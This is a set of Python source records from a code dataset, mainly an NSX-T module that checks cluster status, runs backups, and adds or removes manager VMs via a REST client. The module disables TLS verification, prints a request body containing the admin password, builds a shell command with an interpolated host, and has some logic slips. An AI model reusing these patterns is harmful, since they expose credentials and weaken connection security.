_out_new_lines(step.what_learned)\n\t\t\t\t\t\t\t\tdesc.add_item(\"What I've learned of you want to do, in which preferred ways, and why:\", ps[0])\n\t\t\t\t\t\t\t\tfor p in ps[1:]:\n\t\t\t\t\t\t\t\t\tdoc.append(p)\n\t\t\t\t\t\t\t\t\tdoc.append(NewLine())\n\t\t\t\t\t\t\tif step.this_is_designed_for:\n\t\t\t\t\t\t\t\tps = _out_new_lines(step.this_is_designed_for)\n\t\t\t\t\t\t\t\tdesc.add_item(\"This is the system that I have therefore designed for you:\", ps[0])\n\t\t\t\t\t\t\t\tfor p in ps[1:]:\n\t\t\t\t\t\t\t\t\tdoc.append(p)\n\t\t\t\t\t\t\t\t\tdoc.append(NewLine())\n\t\t\t\t\n\t\t\t\t\tdoc.append(NewPage())\n\t\t \n\t\t\tif ev.comparison:\n\t\t\t\tc = ev.comparison\n\t\t\t\t\n\t\t\t\twith doc.create(Section('UNIFIED METACOMUNICATION MESSAGE')):\n\t\t\t\t\twith doc.create(Description()) as desc:\n\t\t\t\t\t\tif c.who_you_are:\n\t\t\t\t\t\t\tps = _out_new_lines(c.who_you_are)\n\t\t\t\t\t\t\tdesc.add_item(\"Who are you:\", ps[0])\n\t\t\t\t\t\t\tfor p in ps[1:]:\n\t\t\t\t\t\t\t\tdoc.append(p)\n\t\t\t\t\t\t\t\tdoc.append(NewLine())\n\n\t\t\t\t\t\tif c.what_learned:\n\t\t\t\t\t\t\tps = _out_new_lines(c.what_learned)\n\t\t\t\t\t\t\tdesc.add_item(\"What I've learned of you want to 
do, in which preferred ways, and why:\", ps[0])\n\t\t\t\t\t\t\tfor p in ps[1:]:\n\t\t\t\t\t\t\t\tdoc.append(p)\n\t\t\t\t\t\t\t\tdoc.append(NewLine())\n\n\t\t\t\t\t\tif c.this_is_designed_for:\n\t\t\t\t\t\t\tps = _out_new_lines(c.this_is_designed_for)\n\t\t\t\t\t\t\tdesc.add_item(\"This is the system that I have therefore designed for you:\", ps[0])\n\t\t\t\t\t\t\tfor p in ps[1:]:\n\t\t\t\t\t\t\t\tdoc.append(p)\n\t\t\t\t\t\t\t\tdoc.append(NewLine())\n\t\t\t\t\t\t\t\n\t\t\t\twith doc.create(Section('SYSTEM COMMUNICABILLITY')):\n\t\t\t\t\tif ev.remarks:\n\t\t\t\t\t\twith doc.create(SmallText(\"Remarks:\")):\n\t\t\t\t\t\t\twith doc.create(Itemize()) as itemize:\n\t\t\t\t\t\t\t\tfor r in ev.remarks:\n\t\t\t\t\t\t\t\t\tfor p in _out_new_lines(r.description):\n\t\t\t\t\t\t\t\t\t\titemize.add_item(p)\t\t\t\t\n\n\t\t\t\twith doc.create(Description()) as desc:\n\t\t\t\t\tif c.conclusion:\n\t\t\t\t\t\tfor p in _out_new_lines(c.conclusion):\n\t\t\t\t\t\t\tdesc.add_item(\"Conclusion:\", p)\n\t\t\tif output == 'pdf':\n\t\t\t\ttry:\n\t\t\t\t\tdoc.generate_pdf(file,clean_tex=True)\n\t\t\t\texcept Exception as e:\n\t\t\t\t\tdoc.generate_pdf(file,clean=False,compiler='lualatex')\n\t\t\telse:\n\t\t\t\tdoc.generate_tex(file)\n\n\t\t\tq = db_session.query(Report).filter(Report.evaluation_id==evaluation_id)\n\t\t\tversion = 0 or q.count()\n\n\t\t\tr = Report()\n\t\t\tr.file = file\n\t\t\tr.version = version + 1\n\t\t\tr.evaluation_id = evaluation_id\n\n\t\t\tdb_session.add(r)\n\t\t\tdb_session.commit()\n\n\treturn name\n\n","sub_path":"web/frontend/printr.py","file_name":"printr.py","file_ext":"py","file_size_in_byte":6622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"584334310","text":"#!/usr/bin/env python3\n'''\nIonut Pirva \nSeptember 2021\n'''\n\nimport sys, subprocess, time\nfrom pprint import pprint\n\nfrom python.functions.variables import f_check_env_variables\n\n# add nsxOpenAPIBinding to the path where python will look for modules\nnsxOpenAPIBindingDir = f_check_env_variables(var = [\"nsxOpenAPIBindingDir\"])[\"nsxOpenAPIBindingDir\"]\nsys.path.insert(0, nsxOpenAPIBindingDir)\n\ndef f_check_nsx_nodes_status(nsxClusterIP: str = None, nsxClusterUser: str = None, nsxClusterPass: str = None, nsxClusterNodeUUID: list = None) -> dict:\n '''\n Return NSX Manager nodes status\n '''\n \n # keep Node UUID to IP map\n nsxNodeUUID2IP = dict()\n\n if nsxClusterNodeUUID == None:\n # initialize\n nsxClusterNodeUUID = list()\n # get out nodes UUID from cluster status\n nsxClusterStatus = f_check_nsx_cluster_status(nsxClusterIP = nsxClusterIP, nsxClusterUser = nsxClusterUser, nsxClusterPass = nsxClusterPass)\n try:\n nsxClusterStatusMembers = nsxClusterStatus[\"control_plane_nodes\"][\"members\"]\n for item in nsxClusterStatusMembers:\n ip, fqdn, uuid = item\n nsxClusterNodeUUID.append(uuid)\n if uuid not in nsxNodeUUID2IP.keys():\n nsxNodeUUID2IP[uuid] = dict() \n nsxNodeUUID2IP[uuid][\"IPv4\"] = ip\n nsxNodeUUID2IP[uuid][\"FQDN\"] = fqdn\n except Exception as e:\n print(f\"ERROR read NSX Manager Nodes UUID from {str(nsxClusterStatus)}: {str(e)}\")\n return None\n\n if type(nsxClusterNodeUUID) is not list:\n print(f\"ERROR provide a list with NSX Manager Cluster Node UUID to check. 
E.g: {str(['db1bb097-8ffd-49cc-9280-0dc46f854cd7', '137f0642-612b-b4d6-a86f-5a3fff706ede'])}\")\n return None\n else:\n # keep unique entries only\n nsxClusterNodeUUID = set(nsxClusterNodeUUID)\n if len(nsxClusterNodeUUID) == 0:\n print(f\"ERROR provide a list with NSX Manager Cluster Node UUID to check. E.g: {str(['db1bb097-8ffd-49cc-9280-0dc46f854cd7', '137f0642-612b-b4d6-a86f-5a3fff706ede'])}\")\n return None\n\n import swagger_client.configuration\n import swagger_client.rest\n import swagger_client.api_client\n from swagger_client.api.system_administration_configuration_nsx_managers_clusters_cluster_status_api import SystemAdministrationConfigurationNSXManagersClustersClusterStatusApi\n \n # Configure HTTP basic authorization: BasicAuth\n configuration = swagger_client.Configuration()\n configuration.host = f\"https://{nsxClusterIP}/api/v1\"\n configuration.username = nsxClusterUser\n configuration.password = nsxClusterPass\n configuration.verify_ssl = False\n\n nsxNodeStatus = dict()\n for nodeUUID in nsxClusterNodeUUID:\n print(f\"Check NSX Manager Node status: GET '/cluster/nodes/{str(nodeUUID)}/status'\\n\")\n # create an instance of the API class\n APIInstance = swagger_client.SystemAdministrationConfigurationNSXManagersClustersClusterStatusApi(swagger_client.ApiClient(configuration))\n try:\n # GET '/cluster/nodes/{node-id}/status'\n nsxNodeStatus[nodeUUID] = APIInstance.read_cluster_node_status_with_http_info(node_id=nodeUUID)\n nsxNodeStatusHTTPCode = nsxNodeStatus[nodeUUID][1]\n nsxNodeStatusOutput = nsxNodeStatus[nodeUUID][0]\n except Exception as e:\n print(f\"ERROR while trying to GET NSX node {str(nodeUUID)} status: {str(e)}\")\n return None\n if nsxNodeStatusHTTPCode == 200:\n print(f\"SUCCESS NSX API GET cluster node {str(nodeUUID)} status returned HTTP code: {str(nsxNodeStatusHTTPCode)}\")\n else:\n print(f\"ERROR NSX API GET cluster node {str(nodeUUID)} status returned HTTP code: {str(nsxNodeStatusHTTPCode)}\")\n return None\n\n # keep node UUID, system_status (cpu_*, disk_*, mem_*, system_time, uptime), version\n output = {}\n try:\n for k, v in nsxNodeStatus.items():\n if k not in output.keys():\n output[k] = dict()\n output[k][\"node_uuid\"] = k\n output[k][\"ipv4\"] = nsxNodeUUID2IP[k][\"IPv4\"]\n output[k][\"fqdn\"] = nsxNodeUUID2IP[k][\"FQDN\"]\n output[k][\"version\"] = v[0].version\n output[k][\"system_status\"] = dict()\n output[k][\"system_status\"][\"cpu_cores\"] = v[0].system_status.cpu_cores\n output[k][\"system_status\"][\"disk_space_total\"] = v[0].system_status.disk_space_total\n output[k][\"system_status\"][\"disk_space_used\"] = v[0].system_status.disk_space_used\n output[k][\"system_status\"][\"mem_cache\"] = v[0].system_status.mem_cache\n output[k][\"system_status\"][\"mem_total\"] = v[0].system_status.mem_total\n output[k][\"system_status\"][\"mem_used\"] = v[0].system_status.mem_used\n output[k][\"system_status\"][\"uptime\"] = v[0].system_status.uptime\n except Exception as e:\n print(f\"ERROR while trying to GET NSX nodes {str(nsxClusterNodeUUID)} status: {str(e)}\")\n return None\n\n return output\n\ndef f_check_nsx_cluster_status(nsxClusterIP: str = None, nsxClusterUser: str = None, nsxClusterPass: str = None) -> dict:\n '''\n Return NSX Manager cluster status\n '''\n\n import swagger_client.configuration\n import swagger_client.rest\n import swagger_client.api_client\n from swagger_client.api.system_administration_configuration_nsx_managers_clusters_cluster_status_api import 
SystemAdministrationConfigurationNSXManagersClustersClusterStatusApi\n\n # Configure HTTP basic authorization: BasicAuth\n configuration = swagger_client.Configuration()\n configuration.host = f\"https://{nsxClusterIP}/api/v1\"\n configuration.username = nsxClusterUser\n configuration.password = nsxClusterPass\n configuration.verify_ssl = False\n\n print(\"Check NSX Manager cluster status: GET '/cluster/status'\\n\")\n # create an instance of the API class\n APIInstance = swagger_client.SystemAdministrationConfigurationNSXManagersClustersClusterStatusApi(swagger_client.ApiClient(configuration))\n\n try:\n # GET '/cluster/status'\n nsxClusterStatus = APIInstance.read_cluster_status_with_http_info()\n nsxClusterStatusHTTPCode = nsxClusterStatus[1]\n nsxClusterStatusOutput = nsxClusterStatus[0]\n except Exception as e:\n print(f\"ERROR while trying to GET NSX cluster status: {str(e)}\")\n return None\n if nsxClusterStatusHTTPCode == 200:\n print(f\"SUCCESS NSX API GET cluster status returned HTTP code: {str(nsxClusterStatusHTTPCode)}\")\n else:\n print(f\"ERROR NSX API GET cluster status returned HTTP code: {str(nsxClusterStatusHTTPCode)}\")\n return None\n\n output = {}\n\n try:\n # nsx cluster id\n nsxClusterID = nsxClusterStatusOutput.cluster_id\n # nsx cluster control plane status\n nsxClusterControlStatus = nsxClusterStatusOutput.control_cluster_status.status\n # nsx cluster overall status\n nsxClusterOverallStatus = nsxClusterStatusOutput.detailed_cluster_status.overall_status\n # nsx cluster management status: offline and online nodes\n nsxClusterMgmtStatus = nsxClusterStatusOutput.mgmt_cluster_status.status\n if nsxClusterStatusOutput.mgmt_cluster_status.offline_nodes is None:\n # no mgmt plane offline for any nodes\n nsxClusterMgmtOfflineNodes = None\n else:\n nsxClusterMgmtOfflineNodes = list()\n for node in nsxClusterStatusOutput.mgmt_cluster_status.offline_nodes:\n nsxClusterMgmtOfflineNodes.append(node)\n if nsxClusterStatusOutput.mgmt_cluster_status.online_nodes is None:\n # no mgmt plane offline for any nodes\n nsxClusterMgmtOnlineNodes = None\n else:\n nsxClusterMgmtOnlineNodes = list()\n for node in nsxClusterStatusOutput.mgmt_cluster_status.online_nodes:\n nsxClusterMgmtOnlineNodes.append(node)\n # nsxClusterControlGroups is a list with all the control plane services, its memebers and status per member\n nsxClusterControlGroups = nsxClusterStatusOutput.detailed_cluster_status.groups\n if type(nsxClusterControlGroups) == list:\n if len(nsxClusterControlGroups) > 0:\n nsxClusterControlNodes = {}\n # which node uuid handles the cluster vip\n nsxClusterControlNodes[\"vip_node_uuid\"] = None\n nsxClusterControlNodes[\"groups\"] = {}\n nsxClusterControlNodes[\"members\"] = set()\n # nsxClusterControlNodes[\"members\"] = {}\n for el in nsxClusterControlGroups:\n nsxClusterControlNodesMembers = el.members\n # el.group_status\n # el.group_type\n # el.group_id\n if el.group_type == \"HTTPS\" or el.group_type == \"HTTP\":\n nsxClusterControlNodes[\"vip_node_uuid\"] = el.leaders[0].leader_uuid\n if el.group_id not in nsxClusterControlNodes[\"groups\"].keys():\n nsxClusterControlNodes[\"groups\"][el.group_id] = {}\n nsxClusterControlNodes[\"groups\"][el.group_id][\"group_status\"] = el.group_status\n nsxClusterControlNodes[\"groups\"][el.group_id][\"group_type\"] = el.group_type\n nsxClusterControlNodes[\"groups\"][el.group_id][\"members\"] = list()\n for m in nsxClusterControlNodesMembers:\n nsxClusterControlNodes[\"groups\"][el.group_id][\"members\"].append({\n \"member_fqdn\": 
m.member_fqdn,\n \"member_ip\": m.member_ip,\n \"member_status\": m.member_status,\n \"member_uuid\": m.member_uuid\n })\n if el.group_type != \"CONTROLLER\":\n nsxClusterControlNodes[\"members\"].add(\n (m.member_ip, m.member_fqdn, m.member_uuid)\n )\n else: \n nsxClusterControlNodes = None\n else:\n nsxClusterControlNodes = None\n except Exception as e:\n print(f\"ERROR NSX API GET cluster status processing failed: {str(e)}\")\n return None\n else:\n output[\"cluster_id\"] = nsxClusterID\n output[\"overall_status\"] = nsxClusterOverallStatus\n output[\"control_plane_status\"] = nsxClusterControlStatus\n output[\"management_plane_status\"] = nsxClusterMgmtStatus\n output[\"management_offline\"] = nsxClusterMgmtOfflineNodes\n output[\"management_online\"] = nsxClusterMgmtOnlineNodes\n output[\"control_plane_nodes\"] = nsxClusterControlNodes\n\n return output\n\ndef f_check_nsx_backup_status(nsxClusterIP: str = None, nsxClusterUser: str = None, nsxClusterPass: str = None) -> dict:\n '''\n Return NSX backup status\n '''\n\n import swagger_client.configuration\n import swagger_client.rest\n import swagger_client.api_client\n from swagger_client.api.system_administration_lifecycle_management_backup_restore_management_backup_api import SystemAdministrationLifecycleManagementBackupRestoreManagementBackupApi\n\n # Configure HTTP basic authorization: BasicAuth\n configuration = swagger_client.Configuration()\n configuration.host = f\"https://{nsxClusterIP}/api/v1\"\n configuration.username = nsxClusterUser\n configuration.password = nsxClusterPass\n configuration.verify_ssl = False\n\n print(\"Check NSX Backup status: GET '/backups/config'\\n\")\n # create an instance of the API class\n APIInstance = swagger_client.SystemAdministrationLifecycleManagementBackupRestoreManagementBackupApi(swagger_client.ApiClient(configuration))\n try:\n # GET '/backups/config'\n nsxBackupStatus = APIInstance.get_backup_config_with_http_info()\n nsxBackupStatusHTTPCode = nsxBackupStatus[1]\n nsxBackupStatusOutput = nsxBackupStatus[0]\n except Exception as e:\n print(f\"ERROR while trying to GET NSX backup status: {str(e)}\")\n return None\n else:\n print(nsxBackupStatusOutput)\n \n if nsxBackupStatusHTTPCode == 200:\n print(f\"SUCCESS NSX API GET backup status returned HTTP code: {str(nsxBackupStatusHTTPCode)}\")\n else:\n print(f\"ERROR NSX API GET backup status returned HTTP code: {str(nsxBackupStatusHTTPCode)}\")\n return None\n\n nsxBackupEnabled = None\n\n try:\n # nsx backup enabled True or False\n nsxBackupEnabled = nsxBackupStatusOutput.backup_enabled\n except Exception as e:\n print(f\"ERROR NSX API GET backup status processing failed: {str(e)}\")\n return None\n else:\n print(f\"SUCCESS NSX API GET backup status returned: {str(nsxBackupEnabled)}\")\n if nsxBackupEnabled is True:\n print(f\"SUCCESS NSX Cluster backup is enabled\")\n if nsxBackupStatus is False:\n print(f\"SUCCESS NSX Cluster backup is NOT enabled\")\n\n return nsxBackupEnabled\n\ndef f_do_nsx_backup(nsxClusterIP: str = None, nsxClusterUser: str = None, nsxClusterPass: str = None) -> dict:\n '''\n Perform NSX backup\n cluster-node-backups\n inventory-summary\n '''\n\n import swagger_client.configuration\n import swagger_client.rest\n import swagger_client.api_client\n from swagger_client.api.system_administration_lifecycle_management_backup_restore_management_backup_api import SystemAdministrationLifecycleManagementBackupRestoreManagementBackupApi\n\n\n print(f\"Checking NSX Cluster backup status ...\")\n nsxBackupStatus = 
f_check_nsx_backup_status(nsxClusterIP = nsxClusterIP, nsxClusterUser = nsxClusterUser, nsxClusterPass = nsxClusterPass)\n if nsxBackupStatus is not True:\n print(f\"ERROR to perform NSX backup: NSX Backup must be enabled.\")\n return None\n \n # Configure HTTP basic authorization: BasicAuth\n configuration = swagger_client.Configuration()\n configuration.host = f\"https://{nsxClusterIP}/api/v1\"\n configuration.username = nsxClusterUser\n configuration.password = nsxClusterPass\n configuration.verify_ssl = False\n \n # async_req=False\n print(f\"Synchronous NSX backup ongoing ...\\n\")\n\n # create an instance of the API class\n APIInstance = swagger_client.SystemAdministrationLifecycleManagementBackupRestoreManagementBackupApi(swagger_client.ApiClient(configuration))\n try:\n # POST '/cluster?action=backup_to_remote'\n # do sync backup\n nsxDoBackup = APIInstance.request_onetime_backup_backup_to_remote_with_http_info(async_req=False)\n except Exception as e:\n print(f\"ERROR while trying to GET NSX backup status: {str(e)}\")\n return None\n\n return True\n\n\ndef f_add_vm_nsx_cluster(nsxNewVMIP: str = None, nsxClusterIP: str = None, nsxClusterUser: str = None, nsxClusterPass: str = None) -> dict:\n '''\n ADD NSX Manager VM to cluster\n '''\n\n import swagger_client.configuration\n import swagger_client.rest\n import swagger_client.api_client\n from swagger_client.api.system_administration_configuration_nsx_managers_clusters_cluster_configuration_api import SystemAdministrationConfigurationNSXManagersClustersClusterConfigurationApi\n\n\n print(f\"Checking NSX Cluster status ...\")\n try:\n nsxClusterStatus = f_check_nsx_cluster_status(nsxClusterIP=nsxClusterIP, nsxClusterUser=nsxClusterUser, nsxClusterPass=nsxClusterPass)\n nsxClusterID = nsxClusterStatus[\"cluster_id\"]\n nsxClusterStatusOverall = nsxClusterStatus[\"overall_status\"]\n nsxClusterStatusCtrlGlobal = nsxClusterStatus[\"control_plane_status\"]\n nsxClusterStatusMgmtGlobal = nsxClusterStatus[\"management_plane_status\"]\n nsxClusterMembers = nsxClusterStatus[\"control_plane_nodes\"][\"members\"]\n except Exception as e:\n print(f\"ERROR while trying to GET NSX Cluster ID: {str(e)}\")\n return None\n for item in nsxClusterMembers:\n if nsxNewVMIP in item:\n print(f\"ERROR NSX Manager VM is already part of the NSX cluster ID {nsxClusterID}\")\n pprint(nsxClusterStatus)\n return None\n\n # move forward only if the cluster status is STABLE\n if nsxClusterStatusOverall != \"STABLE\":\n print(f\"ERROR NSX Manager cluster ID {nsxClusterID} overall status must be STABLE, and not {nsxClusterStatusOverall}\")\n return None\n else:\n print(f\"SUCCESS NSX Manager cluster ID {nsxClusterID} overall status is {nsxClusterStatusOverall}\")\n\n # get certficate_sha256_thumbprint\n print(f\"Get NSX Cluster {nsxClusterIP}:443 SSL SHA256 thumbprint ...\")\n nsxClusterIPSHA256Thumbprint = None\n try:\n cmdGetSHA256Thumbprint = (\n f\"openssl s_client -connect {nsxClusterIP}:443 < /dev/null 2>/dev/null | openssl x509 -fingerprint -sha256 -noout -in /dev/stdin \"\n \" | awk -F= '{gsub (\\\"[:]\\\",\\\"\\\"); printf $2}'\"\n )\n cmdRunGetSHA256Thumbprint = subprocess.Popen(cmdGetSHA256Thumbprint, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n cmdRunGetSHA256ThumbprintStdOut, cmdRunGetSHA256ThumbprintStdErr = cmdRunGetSHA256Thumbprint.communicate()\n except Exception as e:\n print(f\"ERROR cannot get SSL SHA256 thumbprint for {nsxClusterIP}:443: {str(e)}\")\n return None\n else:\n if len(cmdRunGetSHA256ThumbprintStdErr.decode()) != 0:\n 
print(f\"ERROR while reading the SSL SHA256 thumbprint for {nsxClusterIP}:443: {str(cmdRunGetSHA256ThumbprintStdErr.decode())}\")\n return None\n else:\n print(f\"SUCCESS the SSL SHA256 thumbprint for {nsxClusterIP}:443 is: {str(cmdRunGetSHA256ThumbprintStdOut.decode())}\")\n nsxClusterIPSHA256Thumbprint = cmdRunGetSHA256ThumbprintStdOut.decode()\n\n # Configure HTTP basic authorization: BasicAuth\n configuration = swagger_client.Configuration()\n configuration.host = f\"https://{nsxNewVMIP}/api/v1\"\n configuration.username = nsxClusterUser\n configuration.password = nsxClusterPass\n configuration.verify_ssl = False\n\n # create an instance of the API class\n APIInstance = swagger_client.SystemAdministrationConfigurationNSXManagersClustersClusterConfigurationApi(swagger_client.ApiClient(configuration))\n\n reqBody = {\n \"cluster_id\": nsxClusterID, \n \"ip_address\": nsxClusterIP, \n \"username\": nsxClusterUser, \n \"password\": nsxClusterPass, \n \"certficate_sha256_thumbprint\": nsxClusterIPSHA256Thumbprint\n }\n \n # add new NSX Manager VM to cluster\n # synchronous action\n print(f\"Adding NSX Manager VM {nsxNewVMIP} to NSX Manager {nsxClusterIP} cluster ID {nsxClusterID} ...\")\n print(f\"POST '/cluster?action=join_cluster'\")\n print(f\"{str(reqBody)}\")\n try:\n # POST '/cluster?action=join_cluster'\n nsxVMJoinCluster = APIInstance.join_cluster_join_cluster_with_http_info(reqBody, async_req=False)\n nsxVMJoinClusterHTTPCode = nsxVMJoinCluster[1]\n nsxVMJoinClusterOutput = nsxVMJoinCluster[0]\n except Exception as e:\n print(f\"ERROR while trying to add NSX Manager VM {nsxNewVMIP} to NSX Manager {nsxClusterIP} cluster ID {nsxClusterID}: {str(e)}\")\n return None\n else:\n print(nsxVMJoinClusterOutput)\n \n if nsxVMJoinClusterHTTPCode == 200:\n print(f\"SUCCESS NSX API POST add NSX Manager VM {nsxNewVMIP} to NSX Manager {nsxClusterIP} cluster ID {nsxClusterID} returned HTTP code: {str(nsxVMJoinClusterHTTPCode)}\")\n newVMJoined = False\n for i in nsxVMJoinClusterOutput.nodes:\n if nsxNewVMIP in (i.entities[0].fqdn, i.entities[0].ip_address):\n if i.status == \"JOINED\":\n print(f\"SUCCESS NSX Manager VM {nsxNewVMIP} joined NSX Manager {nsxClusterIP} cluster ID {nsxClusterID}\")\n newVMJoined = True\n if newVMJoined is False:\n print(f\"ERROR NSX Manager VM {nsxNewVMIP} did NOT join NSX Manager {nsxClusterIP} cluster ID {nsxClusterID}\")\n else:\n print(f\"ERROR NSX API POST add NSX Manager VM {nsxNewVMIP} to NSX Manager {nsxClusterIP} cluster ID {nsxClusterID} returned HTTP code: {str(nsxVMJoinClusterHTTPCode)}\")\n return None\n \n # terminate loop after 15 minutes\n whileLoopTerminate = 15*60 # seconds\n whileLoopSleep = 10 # seconds\n whileLoopCounter = 0\n while True:\n print(f\"INFO Waiting for the NSX cluster overall status to transition to STABLE {whileLoopTerminate - whileLoopCounter} / {whileLoopTerminate} seconds ...\")\n print(f\"{str(whileLoopCounter)} seconds passed ...\")\n\n try:\n nsxClusterStatus = f_check_nsx_cluster_status(nsxClusterIP=nsxClusterIP, nsxClusterUser=nsxClusterUser, nsxClusterPass=nsxClusterPass)\n nsxClusterID = nsxClusterStatus[\"cluster_id\"]\n nsxClusterStatusCtrlGlobal = nsxClusterStatus[\"control_plane_status\"]\n nsxClusterStatusMgmtGlobal = nsxClusterStatus[\"management_plane_status\"]\n except Exception as e:\n print(f\"ERROR while trying to GET NSX Cluster ID: {str(e)}\")\n break\n\n # move forward only if the cluster status is STABLE\n if nsxClusterStatusOverall == \"STABLE\":\n print(f\"SUCCESS NSX Manager cluster ID {nsxClusterID} 
overall status is {nsxClusterStatusOverall}\")\n break\n else:\n print(f\"INFO NSX Manager cluster ID {nsxClusterID} overall status is {nsxClusterStatusOverall}\")\n # sleep\n time.sleep(whileLoopSleep)\n \n if whileLoopCounter >= whileLoopTerminate:\n print(f\"ERROR Wait time of {str(whileLoopTerminate)} seconds expired.\")\n break\n whileLoopCounter += whileLoopSleep\n\n return f_check_nsx_cluster_status(nsxClusterIP=nsxClusterIP, nsxClusterUser=nsxClusterUser, nsxClusterPass=nsxClusterPass)\n\ndef f_remove_vm_nsx_cluster(nsxVMIP: list = None, nsxNewVM: list = None, nsxKeepVM: list = None, nsxClusterIP: str = None, nsxClusterUser: str = None, nsxClusterPass: str = None) -> dict:\n '''\n Remove NSX Manager VM from cluster\n nsxVMIP, nsxNewVM = [(IP, HOSTNAME), ]\n\n nsxVMIP = specific IP -> remove that specific NSX VM\n - this is done without checking that NSX Cluster overall status be STABLE\n nsxVMIP = None -> remove the old NSX Manager VMs and keep the newly deployed ones\n - this is done only if the NSX Cluster overall status is STABLE\n '''\n\n import swagger_client.configuration\n import swagger_client.rest\n import swagger_client.api_client\n from swagger_client.api.system_administration_configuration_nsx_managers_clusters_cluster_configuration_api import SystemAdministrationConfigurationNSXManagersClustersClusterConfigurationApi\n\n print(f\"Checking NSX Cluster status ...\")\n try:\n nsxClusterStatus = f_check_nsx_cluster_status(nsxClusterIP=nsxClusterIP, nsxClusterUser=nsxClusterUser, nsxClusterPass=nsxClusterPass)\n nsxClusterID = nsxClusterStatus[\"cluster_id\"]\n nsxClusterStatusOverall = nsxClusterStatus[\"overall_status\"]\n nsxClusterStatusCtrlGlobal = nsxClusterStatus[\"control_plane_status\"]\n nsxClusterStatusMgmtGlobal = nsxClusterStatus[\"management_plane_status\"]\n nsxClusterMembers = nsxClusterStatus[\"control_plane_nodes\"][\"members\"]\n nsxClusterMembersMgmtOnline = nsxClusterStatus[\"management_online\"]\n except Exception as e:\n print(f\"ERROR while trying to GET NSX Cluster ID: {str(e)}\")\n return None\n\n nsxVMUUID2IP = dict()\n\n # remove the new NSX VMs\n # keep the VMs from nsxKeepVM\n if nsxVMIP is not None:\n nsxVMUUID2Remove = list()\n nsxNewVMIPList = set()\n try:\n for item in nsxVMIP:\n a, b = item\n # keep the IP\n nsxNewVMIPList.add(a)\n\n for item in nsxClusterMembers:\n nsxVMIPv4Val, nsxVMHostnameVal, nsxVMUUIDVal = item\n if nsxVMIPv4Val in nsxNewVMIPList:\n nsxVMUUID2Remove.append(nsxVMUUIDVal)\n nsxVMUUID2IP[nsxVMUUIDVal] = nsxVMIPv4Val\n\n except Exception as e:\n pprint(f\"ERROR cannot determine node UUID for VM IP {str(nsxVMIP)} reading {nsxClusterMembers}: {str(e)}\")\n return None\n \n # remove the old NSX VMs\n if nsxVMIP is None:\n nsxVMUUID2Remove = list()\n nsxNewVMIPList = set()\n \n nsxKeepVMIPList = set()\n nsxExistingVMIP = set()\n\n # move forward only if the cluster status is STABLE\n if nsxClusterStatusOverall != \"STABLE\":\n print(f\"ERROR NSX Manager cluster ID {nsxClusterID} overall status must be STABLE, and not {nsxClusterStatusOverall}\")\n return None\n else:\n print(f\"SUCCESS NSX Manager cluster ID {nsxClusterID} overall status is {nsxClusterStatusOverall}\")\n\n try:\n for item in nsxNewVM:\n a, b = item\n # keep the IP\n nsxNewVMIPList.add(a)\n\n if nsxKeepVM is not None:\n for item in nsxKeepVM:\n a, b = item\n # keep the IP\n nsxKeepVMIPList.add(a)\n\n for item in nsxClusterMembers:\n nsxVMIPv4Val, nsxVMHostnameVal, nsxVMUUIDVal = item\n # capture the existing NSX Manager VM IPv4\n if nsxVMIPv4Val not in 
nsxNewVMIPList:\n nsxExistingVMIP.add(nsxVMIPv4Val)\n if nsxVMIPv4Val not in nsxNewVMIPList and nsxVMIPv4Val not in nsxKeepVMIPList:\n nsxVMUUID2Remove.append(nsxVMUUIDVal)\n nsxVMUUID2IP[nsxVMUUIDVal] = nsxVMIPv4Val\n except Exception as e:\n pprint(f\"ERROR cannot determine node UUID for the old NSX Manager VMs while reading {nsxClusterMembers}: {str(e)}\")\n return None\n \n # check that the nsxKeepVMIPList is part of the nsxExistingVMIP\n # if len(nsxKeepVMIPList) == 0 issubset would return True\n if nsxKeepVMIPList.issubset(nsxExistingVMIP) is False and len(nsxKeepVMIPList) > 0:\n pprint(f\"ERROR check that the IPv4 of the NSX Manager VMs chosen to be kept are correct: {str(nsxKeepVMIPList)}. The values must be part of: {str(nsxExistingVMIP)}\")\n return None\n\n if len(nsxVMUUID2Remove) == 0:\n pprint(f\"INFO There are no NSX Manager VM chosen to be removed from the cluster. VMs chosen to be kept: {str(nsxKeepVM)} VMs deployed: {str(nsxClusterMembers)}\")\n return None\n\n\n # Configure HTTP basic authorization: BasicAuth\n configuration = swagger_client.Configuration()\n configuration.host = f\"https://{nsxClusterIP}/api/v1\"\n configuration.username = nsxClusterUser\n configuration.password = nsxClusterPass\n configuration.verify_ssl = False\n \n # create an instance of the API class\n APIInstance = swagger_client.SystemAdministrationConfigurationNSXManagersClustersClusterConfigurationApi(swagger_client.ApiClient(configuration))\n \n # remove NSX Manager VM from cluster\n # synchronous action !!!\n for nsxVMUUID in nsxVMUUID2Remove:\n print(f\"Removing synchronously (!) NSX Manager VM {nsxVMUUID2IP[nsxVMUUID]}, node uuid {nsxVMUUID} from NSX Manager {nsxClusterIP} cluster ID {nsxClusterID} ...\")\n print(f\"POST '/cluster/{nsxVMUUID}?action=remove_node'\")\n try:\n # POST '/cluster/{node-id}?action=remove_node'\n nsxVMRemoveCluster = APIInstance.detach_cluster_node_remove_node_with_http_info(node_id=nsxVMUUID, async_req=False)\n except Exception as e:\n print(f\"ERROR while trying to remove NSX Manager VM {nsxVMUUID2IP[nsxVMUUID]}, node uuid {nsxVMUUID} from NSX Manager {nsxClusterIP} cluster ID {nsxClusterID}: {str(e)}\")\n return None\n else:\n print(nsxVMRemoveCluster)\n print(f\"SUCCESS NSX API POST remove NSX Manager VM {nsxVMUUID2IP[nsxVMUUID]}, node uuid {nsxVMUUID} from NSX Manager {nsxClusterIP} cluster ID {nsxClusterID}\")\n\n return True\n\n\n","sub_path":"NSX-T/ua-change-tshirt-size/python/functions/nsx.py","file_name":"nsx.py","file_ext":"py","file_size_in_byte":28199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"596522860","text":"from IPython.display import display, Javascript, HTML\nfrom pathlib import Path\nimport IPython.core.display\nimport numpy as np\nimport string\nimport json\nimport uuid\n\ndef plot_force_directed_graph(data_set: list = None, state_name=None, image=None, colour=None, zoom=True, coordinates=None, **kwargs):\n \"\"\"[summary]\n Parameters\n ----------\n data_set : list, required\n [description], by default list = None\n state_name : list, optional\n [description], by default None\n image : list, optional\n [description], by default None\n colour : list, optional\n [description], by default None\n zoom : boolean, optional\n [description], by default True\n \n Returns\n -------\n [type]\n [description], network graph\n \n Functions\n --------- \n Binds CSS and Javascript files into one output\n Plotting a network graph\n \"\"\"\n # generate random identifier for SVG element, to avoid 
